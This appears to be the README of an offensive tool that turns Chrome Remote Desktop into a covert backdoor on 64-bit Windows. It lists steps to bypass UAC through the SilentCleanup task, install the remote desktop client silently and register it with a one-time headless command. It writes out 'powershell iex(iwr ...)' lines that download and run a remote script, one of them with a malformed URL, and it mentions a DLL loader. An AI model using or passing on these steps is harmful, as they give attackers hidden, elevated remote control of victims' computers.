Chrome Remote Desktop weaponization Tool(only x64)
- SilentCleanup_BypassUAC
- Downloading the msi file from the website and installing crdp.
- Crdp.ps1 with pre-generated commands and pin numbers according to the crdp format is executed.
V1:
- Create Windows (CMD) on the https://remotedesktop.google.com/headless/ website.
- The generated command is one-time.
- Copy and paste the generated command into crdp.ps1 to the $CRDP_CMD variable on line 3.
- Build the SilentCleanup_BypassUAC project in the code folder and load the script to an address on the web as follows.
- SilentCleanup_BypassUAC.exe "powershell iex(iwr http://127.0.0.1:80/crdp.ps1)"
- SilentCleanup_BypassUAC.exe "powershell iex(iwr http://https://raw.githubusercontent.com/veath1/CRDP/main/crdp.ps1)"
V2:
- Create Windows (CMD) on the https://remotedesktop.google.com/headless/ website.
- The generated command is one-time.
- Copy and paste the generated command into crdp.ps1 to the $CRDP_CMD variable on line 3.
- Build the dll project in the v2 folder and fit it to get it from xloader.ps1 through the website.
- Also available in bat script format via p2cmd.ps1.